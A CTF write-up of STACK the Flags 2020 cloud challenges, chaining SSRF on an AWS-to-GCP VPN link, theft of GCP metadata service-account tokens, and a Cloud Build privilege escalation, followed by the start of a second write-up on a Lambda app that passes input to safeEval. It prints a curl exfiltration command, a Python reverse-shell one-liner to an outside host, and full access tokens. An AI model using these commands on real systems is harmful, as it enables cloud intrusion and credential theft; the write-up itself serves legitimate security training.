                "EnableAcceleration": false,
                "StaticRoutesOnly": false,
                "LocalIpv4NetworkCidr": "0.0.0.0/0",
                "RemoteIpv4NetworkCidr": "0.0.0.0/0",
                "TunnelInsideIpVersion": "ipv4"
            },
            "Routes": [],
            "Tags": [
                {
                    "Key": "Name",
                    "Value": "aws-vpn-connection1"
                }
            ],
            "VgwTelemetry": [
                {
                    "AcceptedRouteCount": 1,
                    "LastStatusChange": "2020-12-09T13:21:11.000Z",
                    "OutsideIpAddress": "54.254.23.247",
                    "Status": "UP",
                    "StatusMessage": "1 BGP ROUTES"
                },
                {
                    "AcceptedRouteCount": 1,
                    "LastStatusChange": "2020-12-09T16:20:56.000Z",
                    "OutsideIpAddress": "54.254.251.166",
                    "Status": "UP",
                    "StatusMessage": "1 BGP ROUTES"
                }
            ]
        }
    ]
}

Whoa! That’s a lot of information.

Essentially, the Amazon EC2 instance has a Site-to-site IPSec VPN tunnel between 54.254.23.247 (Amazon) and 34.87.151.253 (Google Cloud). This creates a persistent connection between the two Virtual Private Cloud (VPC) networks, allowing accessing of network resources in a Google Cloud VPC network from an Amazon VPC network and vice versa.

Let’s also view the network routes configured for the Amazon VPC:

$ aws ec2 describe-route-tables
{
    "RouteTables": [
        {
            "Associations": [
                {
                    "Main": true,
                    "RouteTableAssociationId": "rtbassoc-f9acc780",
                    "RouteTableId": "rtb-f8d8a19e",
                    "AssociationState": {
                        "State": "associated"
                    }
                }
            ],
            "PropagatingVgws": [],
            "RouteTableId": "rtb-f8d8a19e",
            "Routes": [
                {
                    "DestinationCidrBlock": "172.31.0.0/16",
                    "GatewayId": "local",
                    "Origin": "CreateRouteTable",
                    "State": "active"
                },
                {
                    "DestinationCidrBlock": "0.0.0.0/0",
                    "GatewayId": "igw-e15b4f85",
                    "Origin": "CreateRoute",
                    "State": "active"
                }
            ],
            "Tags": [],
            "VpcId": "vpc-66699c00",
            "OwnerId": "843869678166"
        },
        {
            "Associations": [
                {
                    "Main": true,
                    "RouteTableAssociationId": "rtbassoc-04c8bf104c051f5a3",
                    "RouteTableId": "rtb-0723142a5801fe538",
                    "AssociationState": {
                        "State": "associated"
                    }
                }
            ],
            "PropagatingVgws": [
                {
                    "GatewayId": "vgw-03a9749df3e682e4b"
                }
            ],
            "RouteTableId": "rtb-0723142a5801fe538",
            "Routes": [
                {
                    "DestinationCidrBlock": "172.16.0.0/16",
                    "GatewayId": "local",
                    "Origin": "CreateRouteTable",
                    "State": "active"
                },
                {
                    "DestinationCidrBlock": "0.0.0.0/0",
                    "GatewayId": "igw-0ce84b9afa6a16a08",
                    "Origin": "CreateRoute",
                    "State": "active"
                },
                {
                    "DestinationCidrBlock": "10.240.0.0/24",
                    "GatewayId": "vgw-03a9749df3e682e4b",
                    "Origin": "EnableVgwRoutePropagation",
                    "State": "active"
                }
            ],
            "Tags": [],
            "VpcId": "vpc-09e10b8144ebddec2",
            "OwnerId": "843869678166"
        }
    ]
}

Notice that the subnet 10.240.0.0/24 is allocated for gateway ID vgw-03a9749df3e682e4b, which is also the VpnGatewayId found in the VPN connection details. Since the two networks are connected together by the VPN tunnel, we can try to connect to hosts in the VPN network.

To do so, we can leverage the SSRF in the punggol-digital-lock-cors-server application and brute-force against the 10.240.0.0/24 subnet to identify hosts that are alive on the network.

Note: Valid hosts in the 10.240.0.0/24 ranges from 10.240.0.1 to 10.240.0.254, so we only need to bruteforce 254 network hosts.

If a network host is unreachable via SSRF, the response will be extremely delayed. Hence, we can set a timeout of 1 second when performing our brute-force to reduce the scanning time needed.

I used ffuf to fuzz the last octet of the IP address:

$ seq 1 254 > octet
$ ffuf -u http://122.248.230.66/http://10.240.0.FUZZ/ -w octet -timeout 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://122.248.230.66/http://10.240.0.FUZZ:8080/
 :: Wordlist         : FUZZ: octet
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 1
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

100                     [Status: 200, Size: 364, Words: 105, Lines: 13]
:: Progress: [254/254] :: Job [1/1] :: 18 req/sec :: Duration: [0:00:14] :: Errors: 253 ::

We found an alive network host 10.240.0.100!

Now, we can also enumerate all TCP ports and try to discover any HTTP/HTTPS services that we can interact with:

$ seq 1 65535 > ports
$ ffuf -u http://122.248.230.66/http://10.240.0.100:FUZZ/ -w ports -timeout 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://122.248.230.66/http://10.240.0.100:FUZZ/
 :: Wordlist         : FUZZ: ports
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 1
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

80                      [Status: 200, Size: 364, Words: 105, Lines: 13]
:: Progress: [65535/65535] :: Job [1/1] :: 5041 req/sec :: Duration: [0:00:13] :: Errors: 0 ::

Doh! There’s a HTTP webserver running on port 80 on the host all along!

Exploiting SSRF-as-a-Service (“SaaS”) Application

Internal Web Proxy

Great! We discovered yet another proxy application.

Even if we did not realise that this network host is actually within a Google VPC from earlier, we can still realise that pretty quickly in this next step.

Using the proxy, we try to enter http://localhost for the site and see if the response for http://localhost returns the Internal Web Proxy:

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://localhost
<html>
    <head> </head>
    <body> 
        <h4>Internal Web Proxy</h4>
        <p>No more lock down! - by COViD devops team<p>
        <form action="/index.php" method="get">
            <label for="site">Site:</label>
            <input type="text" id="site" name="site">
            <input type="submit" value="Visit">
        </form>
    Failed to parse address "localhost" (error number 0) 
    </body>
</html>

Seems like there’s some parsing errors in the URL supplied. Maybe it requires a port number to be explicitly specified?

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://localhost:80
<html>
    <head> </head>
    <body> 
        <h4>Internal Web Proxy</h4>
        <p>No more lock down! - by COViD devops team<p>
        <form action="/index.php" method="get">
            <label for="site">Site:</label>
            <input type="text" id="site" name="site">
            <input type="submit" value="Visit">
        </form>
    <br><hr><br>HTTP/1.1 400 Bad Request
Date: Thu, 10 Dec 2020 05:53:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 366
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at gcp-vm-asia-southeast1.asia-southeast1-a.c.stack-the-flags-296309.internal Port 80</address>
</body></html>
    </body>
</html>

Interestingly, we got a 404 Bad Request error, leaking the internal hostname of a instance hosted using GCP Compute Engine (inferred from the gcp-* hostname). If we fix the request by adding a trailing slash to the URL http://122.248.230.66/http://10.240.0.100/index.php?site=http://localhost:80, we can use the Internal Web Proxy application to fetch itself:

Internal Web Proxy

Now, we have a working SSRF within the Google VPC network assigned to the GCP Compute Engine instance! :smile:

Can you smell the flag yet? We are so close to the flag now…
Let’s pause for a minute to see where we are at now:
Attack Path Reaching GCP

Metadata FTW

What’s next? Well, we can enumerate the GCP instance metadata server to get temporary service account credentials.

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/
...
HTTP/1.1 200 OK
Metadata-Flavor: Google
Content-Type: application/text
ETag: 2f6048afc5ce2feb
Date: Thu, 10 Dec 2020 06:16:09 GMT
Server: Metadata Server for VM
Connection: Close
Content-Length: 183
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

attributes/
description
disks/
guest-attributes/
hostname
id
image
licenses/
machine-type
maintenance-event
name
network-interfaces/
preempted
scheduling/
service-accounts/
tags
zone

We see that the depreciated v1beta1 metadata endpoint is still enabled, which is great news for us because that way, we don’t have to set the Metadata-Flavor: Google HTTP header in our requests. There doesn’t appear to be a way to make the Internal Web Proxy application set a custom HTTP header for us, so we won’t be able to fetch metadata from the v1 metadata endpoint via SSRF:

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1/
...
HTTP/1.1 403 Forbidden
Metadata-Flavor: Google
Date: Thu, 10 Dec 2020 06:40:48 GMT
Content-Type: text/html; charset=UTF-8
Server: Metadata Server for VM
Connection: Close
Content-Length: 1636
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
...
$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/
...
covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/
default/
...

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/aliases
...
default
...

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/scopes
...
https://www.googleapis.com/auth/cloud-platform
...

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/token
...
{"access_token":"ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU","expires_in":3395,"token_type":"Bearer"}
...

Here, we can see a service account covid-devops@stack-the-flags-296309.iam.gserviceaccount.com assumes the covid-devops role. The scope of the service account is cloud-platform, which looks really promising. Lastly, we also managed to fetch the OAuth token associated with the service account, allowing us to authenticate and perform actions on behalf of the service account.

We will probably also need the project ID so let’s grab that from the metadata server:

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/project/project-id
...

stack-the-flags-296309
...

Enumerating Google Cloud APIs

Looking at the list of Google Cloud APIs available, we see that there are many APIs available for us to use. Note that not all APIs are enabled or accessible by the service account, so we really should start by figuring out what is accessible to us.

Using the GCP’s Identity and Access Management (IAM) API, let’s try to list all roles in the stack-the-flags-296309 project:

$ curl https://iam.googleapis.com/v1/projects/stack-the-flags-296309/roles/?access_token=ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
  "roles": [
    {
      "name": "projects/stack-the-flags-296309/roles/covid_devops",
      "title": "covid-devops",
      "description": "Created on: 2020-11-22",
      "etag": "BwW0oxMMCDU="
    }
  ]
}

That worked! Seems like there’s only the covid_devops role. Let’s try to view the permissions included for the role:

$ curl https://iam.googleapis.com/v1/projects/stack-the-flags-296309/roles/covid_devops?access_token=ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
  "name": "projects/stack-the-flags-296309/roles/covid_devops",
  "title": "covid-devops",
  "description": "Created on: 2020-11-22",
  "includedPermissions": [
    "cloudbuild.builds.create",
    "compute.instances.get",
    "compute.projects.get",
    "iam.roles.get",
    "iam.roles.list",
    "storage.buckets.create",
    "storage.buckets.get",
    "storage.buckets.list",
    "storage.objects.create"
  ],
  "etag": "BwW0oxMMCDU="
}

We observe a few interesting permissions for the covid_devops role. Since we are looking for the flag, perhaps the flag is stored as an object in a GCP Cloud Storage bucket. However, note that we only have the following permissions relating to GCP Cloud Storage:

  • storage.buckets.create
  • storage.buckets.get
  • storage.buckets.list
  • storage.objects.create

Without storage.objects.get permission, we may be unable to read objects stored in the bucket. Nonetheless, let’s proceed on to enumerate the list of buckets using GCP’s Cloud Storage API:

$ curl https://storage.googleapis.com/storage/v1/b?project=stack-the-flags-296309&access_token=ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
  "kind": "storage#buckets",
  "items": [
    {
      "kind": "storage#bucket",
      "selfLink": "https://www.googleapis.com/storage/v1/b/punggol-digital-lock-key",
      "id": "punggol-digital-lock-key",
      "name": "punggol-digital-lock-key",
      "projectNumber": "605021491171",
      "metageneration": "3",
      "location": "ASIA-SOUTHEAST1",
      "storageClass": "STANDARD",
      "etag": "CAM=",
      "defaultEventBasedHold": false,
      "timeCreated": "2020-11-21T20:14:44.705Z",
      "updated": "2020-11-22T07:53:37.521Z",
      "iamConfiguration": {
        "bucketPolicyOnly": {
          "enabled": true,
          "lockedTime": "2021-02-20T07:53:37.511Z"
        },
        "uniformBucketLevelAccess": {
          "enabled": true,
          "lockedTime": "2021-02-20T07:53:37.511Z"
        }
      },
      "locationType": "region",
      "satisfiesPZS": false
    }
  ]
}

We see that there’s a bucket named punggol-digital-lock-key. Perhaps we need to escalate our privileges to another user with storage.objects.get permissions. Reviewing the privileges of the covid_devops role, we see that there is cloudbuild.builds.create IAM permission.

Road to Impersonating the Cloud Build Service Account

Rhino Security Labs wrote an article on a privilege escalation attack using the cloudbuild.builds.create permission, allowing us to obtain the temporary credentials for the GCP’s Cloud Build service account, which may have greater privileges than our current covid_devops assumed role user.

Rhino Security Labs also created a public GitHub repository for IAM Privilege Escalation in GCP containing the exploit script for escalating privileges via cloudbuild.builds.create permission.

Before we continue, do install the googleapiclient dependency using:

$ pip3 install google-api-python-client --user

Then, grab the exploit script and run it.
In this example, the listening host is 3.1.33.7 and the listening port is 31337:

$ git clone https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation
$ cd GCP-IAM-Privilege-Escalation/ExploitScripts/
$ python3 cloudbuild.builds.create.py -p stack-the-flags-296309 -i 3.1.33.7:31337
No credential file passed in, enter an access token to authenticate? (y/n) y
Enter an access token to use for authentication: ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
    "name": "operations/build/stack-the-flags-296309/YTkzZTZmYTMtOWFmOC00YWFjLTg4NTYtNzRlZjlkNGExZGQw",
    "metadata": {
        "@type": "type.googleapis.com/google.devtools.cloudbuild.v1.BuildOperationMetadata",
        "build": {
            "id": "a93e6fa3-9af8-4aac-8856-74ef9d4a1dd0",
            "status": "QUEUED",
            "createTime": "2020-12-10T07:15:13.788132684Z",
            "steps": [
                {
                    "name": "python",
                    "args": [
                        "-c",
                        "import os;os.system(\"curl -d @/root/tokencache/gsutil_token_cache 3.1.33.7:31337\")"
                    ],
                    "entrypoint": "python"
                }
            ],
            "timeout": "600s",
            "projectId": "stack-the-flags-296309",
            "logsBucket": "gs://605021491171.cloudbuild-logs.googleusercontent.com",
            "options": {
                "logging": "LEGACY"
            },
            "logUrl": "https://console.cloud.google.com/cloud-build/builds/a93e6fa3-9af8-4aac-8856-74ef9d4a1dd0?project=605021491171",
            "queueTtl": "3600s",
            "name": "projects/605021491171/locations/global/builds/a93e6fa3-9af8-4aac-8856-74ef9d4a1dd0"
        }
    }
}
Web server started at 0.0.0.0:31337.
Waiting for token at 3.1.33.7:31337...

$ 

Strange! The access token for the GCP Cloud Build service account is not returned to us!
Perhaps something went wrong. Let’s modify the script to get a reverse shell and investigate further:

Add this line and update the host/port just before the build_body dict:

command = f'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.ip_port.split(":")[0]}",{args.ip_port.split(":")[1]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

And, replace these lines:

handler = socketserver.TCPServer(('', int(port)),myHandler)
print(f'Web server started at 0.0.0.0:{port}.')
print(f'Waiting for token at {ip}:{port}...\n')
handler.handle_request()

With these:

print(f'Waiting for reverse shell at {ip}:{port}...\n')
import os; os.system(f"nc -lnvp {port}")

Then, re-run the application again:

$ sudo python3 cloudbuild.builds.create.py -p stack-the-flags-296309 -i 3.1.33.7:31337
No credential file passed in, enter an access token to authenticate? (y/n) y
Enter an access token to use for authentication: ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
    "name": "operations/build/stack-the-flags-296309/MTEzMjBmN2QtNjMzOS00OTMxLTk5NWMtM2ZiZWRkYTNmYWFl",
    "metadata": {
        "@type": "type.googleapis.com/google.devtools.cloudbuild.v1.BuildOperationMetadata",
        "build": {
            "id": "11320f7d-6339-4931-995c-3fbedda3faae",
            "status": "QUEUED",
            "createTime": "2020-12-10T07:15:14.173481293Z",
            "steps": [
                {
                    "name": "python",
                    "args": [
                        "-c",
                        "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"3.1.33.7\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"
                    ],
                    "entrypoint": "python"
                }
            ],
            "timeout": "600s",
            "projectId": "stack-the-flags-296309",
            "logsBucket": "gs://605021491171.cloudbuild-logs.googleusercontent.com",
            "options": {
                "logging": "LEGACY"
            },
            "logUrl": "https://console.cloud.google.com/cloud-build/builds/11320f7d-6339-4931-995c-3fbedda3faae?project=605021491171",
            "queueTtl": "3600s",
            "name": "projects/605021491171/locations/global/builds/11320f7d-6339-4931-995c-3fbedda3faae"
        }
    }
}
Waiting for reverse shell at 3.1.33.7:31337...

Listening on [0.0.0.0] (family 0, port 8080)
Connection from 34.73.245.117 52068 received!
root@aecc318d6dc4:/workspace#

Hooray! We get a root shell! But remember, our goal is not to achieve root on a Cloud Build container, so let’s continue on to get the access token for the Cloud Build service account.

root@aecc318d6dc4:/workspace# cat /root/tokencache/gsutil_token_cache
cat /root/tokencache/gsutil_token_cache
cat: /root/tokencache/gsutil_token_cache: No such file or directory

Oh no. The exploit script failed because the access token cached for use by gsutil is missing!

There are two ways to get the access token from this point on:

  1. Method 1: Query the Metadata Server directly
  2. Method 2: Install gsutil and make it fetch the access token for you

Method 1: Via GCP Instance Metadata Server

root@79e8f1cff449:/workspace# curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/?recursive=true
{
    "605021491171@cloudbuild.gserviceaccount.com": {
        "aliases": ["default"],
        "email": "605021491171@cloudbuild.gserviceaccount.com",
        "scopes": ["https://www.googleapis.com/auth/cloud-platform", "https://www.googleapis.com/auth/cloud-source-tools", "https://www.googleapis.com/auth/userinfo.email"]
    },
    "default": {
        "aliases": ["default"],
        "email": "605021491171@cloudbuild.gserviceaccount.com",
        "scopes": ["https://www.googleapis.com/auth/cloud-platform", "https://www.googleapis.com/auth/cloud-source-tools", "https://www.googleapis.com/auth/userinfo.email"]
    }
}

root@79e8f1cff449:/workspace# curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
{"access_token":"ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY","expires_in":3211,"token_type":"Bearer"}

Method 2: Via gsutil

Using the reverse shell, follow the installation steps for gsutil and then run the following command:

root@79e8f1cff449:/workspace# gcloud auth application-default print-access-token
ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY

Getting the Final Flag From Bucket

Awesome! We managed to obtain the temporary access token for the default GCP Cloud Build service account!

Let’s test to see if the GCP Cloud Build service account has the storage.buckets.list permission:

$ curl 
https://storage.googleapis.com/storage/v1/b/punggol-digital-lock-key/o?project=stack-the-flags-296309&access_token=ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY
{
  "kind": "storage#objects",
  "items": [
    {
      "kind": "storage#object",
      "id": "punggol-digital-lock-key/last_half.txt/1607586270019961",
      "selfLink": "https://www.googleapis.com/storage/v1/b/punggol-digital-lock-key/o/last_half.txt",
      "mediaLink": "https://storage.googleapis.com/download/storage/v1/b/punggol-digital-lock-key/o/last_half.txt?generation=1607586270019961&alt=media",
      "name": "last_half.txt",
      "bucket": "punggol-digital-lock-key",
      "generation": "1607586270019961",
      "metageneration": "1",
      "contentType": "text/plain",
      "storageClass": "STANDARD",
      "size": "17",
      "md5Hash": "WviwTGRF7YEzWXqehPCbHg==",
      "crc32c": "RtRJWw==",
      "etag": "CPmCyMT1wu0CEAE=",
      "timeCreated": "2020-12-10T07:44:30.019Z",
      "updated": "2020-12-10T07:44:30.019Z",
      "timeStorageClassUpdated": "2020-12-10T07:44:30.019Z"
    }
  ]
}

We finally see the second half of the flag stored as an object in the punggol-digital-lock-key bucket!
Does it also have the storage.objects.get permission?

$ curl https://storage.googleapis.com/download/storage/v1/b/punggol-digital-lock-key/o/last_half.txt?generation=1607586270019961&alt=media&project=stack-the-flags-296309&access_token=ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY
4pPro4ch_Is_G00d}

Yes it does! And there we have it! Combining both pieces of the flag together, we get:

govtech-csg{Mult1_Cl0uD_4pPro4ch_Is_G00d}

Complete Attack Path

Here’s an overview of the complete attack path for this challenge: Overview of Attack Path

Thanks for reading my final write-up on the challenges from STACK the Flags 2020 CTF!

It was fun solving these cloud challenges and gaining a much better understanding of the various services offered by cloud vendors as well as knowing how to perform penetration testing on cloud computing environments.

Here’s a write-up on a cloud challenge titled Hold the Line! Perimeter Defences Doing It's Work! which I solved in STACK the Flags 2020 CTF organized by Government Technology Agency of Singapore (GovTech)’s Cyber Security Group (CSG). Unsurprisingly, there were quite a number of solves since the challenge is rather simple and fairly straightforward.

Those that had analysed the arbitrary JavaScript code injection vulnerability in Bassmaster v1.5.1 (CVE-2014-7205) as part of Advanced Web Attacks and Exploitation (AWAE) course/Offensive Security Web Expert (OSWE) certification will definitely find the injection vector somewhat familiar for this challenge.

This challenge is written by Tan Kee Hock from GovTech’s CSG :)

Hold the Line! Perimeter Defences Doing It’s Work! Cloud Challenge

Description:
Apparently, the lead engineer left the company (“Safe Online Technologies”). He was a talented engineer and worked on many projects relating to Smart City. He goes by the handle c0v1d-agent-1. Everyone didn’t know what this meant until COViD struck us by surprise. We received a tip-off from his colleagues that he has been using vulnerable code segments in one of a project he was working on! Can you take a look at his latest work and determine the impact of his actions! Let us know if such an application can be exploited!

Tax Rebate Checker - http://lcyw7.tax-rebate-checker.cf/

Introduction

Let’s start by visiting the challenge site.

Tax Rebate Checker

Examining the client-side source code, we can see that the main JavaScript file loaded is http://lcyw7.tax-rebate-checker.cf/static/js/main.a6818a36.js, which appears to be webpack-ed. Luckily for us, the source mapping file is also available to us at http://lcyw7.tax-rebate-checker.cf/static/js/main.a6818a36.js.map.

You may have heard of Webpack Exploder by @spaceraccoonsec which helps to unpack the source code of the React Webpack-ed application, but are you aware that Google Chrome’s Developer Tools (Chrome DevTools) supports unpacking of Webpack-ed applications out of the box too?

Using Chrome DevTools, we can inspect the original unpacked source files by navigating to the Sources Tab in the top navigation bar, then click on the webpack:// pseudo-protocol in the left sidebar as such:

Analyse Webpack JavaScript Files Using Chrome DevTools

The source code for index.js is shown below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
import React from 'react';
import ReactDOM from 'react-dom';
import axios from 'axios';

class MyForm extends React.Component {
  constructor() {
    super();
    this.state = {
      loading : false,
      message : ''
    };
    this.onInputchange = this.onInputchange.bind(this);
    this.onSubmitForm = this.onSubmitForm.bind(this);
  }

  renderMessage() {
    return this.state.message;
  }

  renderLoading() {
    return 'Please wait...';
  }

  onInputchange(event) {
    this.setState({
      [event.target.name]: event.target.value
    });
  }

  onSubmitForm() {
    let context = this;
    this.setState({
      loading : true,
      message : "Loading..."
    })
    // any changes, please fix at this [https://github.com/c0v1d-agent-1/tax-rebate-checker]
    axios.post('https://cors-anywhere.herokuapp.com/https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker', {
      age: btoa(this.state.age),
      salary: btoa(this.state.salary)
    })
    .then(function (response) {
      context.setState({
        loading : false,
        message : "You will get (SGD) $" + Math.ceil(response.data.results) + " off your taxes!"
      })
    })
    .catch(function (error) {
      console.log(error);
    });
  }

  render() {
    return (
      <div>
        
        <div>
          <label>
            Annual Salary : <input name="salary" type="number" value={this.state.salary} onChange={this.onInputchange}/>
          </label>
        </div>
        <div>
          <label>
            Age : <input name="age" type="number" value={this.state.age} onChange={this.onInputchange} />
          </label>
        </div>
        <div>
            <button onClick={this.onSubmitForm}>Submit</button>
        </div>
        <br></br>
        <p>{this.state.loading ? this.renderLoading() : this.renderMessage()}</p>
      </div>
    );
  }
}
ReactDOM.render(<MyForm />, document.getElementById('root'));

We can see that there is a comment pointing to a GitHub Repository at https://github.com/c0v1d-agent-1/tax-rebate-checker.
Even if this comment is not provided, we will still be able to find this repository easily by:

  • Searching for c0v1d-agent-1 on GitHub
  • Searching for tax-rebate-checker on GitHub

Tax Rebate Checker GitHub Search

Back to the source code of the React application, we also see the following code:

1
2
3
4
axios.post('https://cors-anywhere.herokuapp.com/https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker', {
    age: btoa(this.state.age),
    salary: btoa(this.state.salary)
})

We discover the use of cors-anywhere proxy, a service which basically helps to relay the request to the target URL and adding Cross-Origin Resource Sharing (CORS) headers. In other words, the target URL is https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker.

Examining the target URL carefully, we can observe that it is a REST API in Amazon API Gateway. Amazon API Gateway is also often used with AWS Lambda, which is something worth noting before we move on to explore what’s in the GitHub repository.

Analysing GitHub Repository

At https://github.com/c0v1d-agent-1/tax-rebate-checker, we see a Node.js application.
The default README mentions Deploy to AWS Lambda service, which is what we noted earlier on already.

Let’s look at the source code of the application. The source code of index.js is shown below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
'use strict';
var safeEval = require('safe-eval')
exports.handler = async (event) => {
    let responseBody = {
        results: "Error!"
    };
    let responseCode = 200;
    try {
        if (event.body) {
            let body = JSON.parse(event.body);
            // Secret Formula
            let context = {person: {code: 3.141592653589793238462}};
            let taxRebate = safeEval((new Buffer(body.age, 'base64')).toString('ascii') + " + " + (new Buffer(body.salary, 'base64')).toString('ascii') + " * person.code",context);
            responseBody = {
                    results: taxRebate
            };
        }
    } catch (err) {
        responseCode = 500;
    }
    let response = {
        statusCode: responseCode,
        headers: {
            "x-custom-header" : "tax-rebate-checker"
        },
        body: JSON.stringify(responseBody)
    };
    return response;
};

Looks like our input supplied as a JSON object containing age and salary are being safeEval().

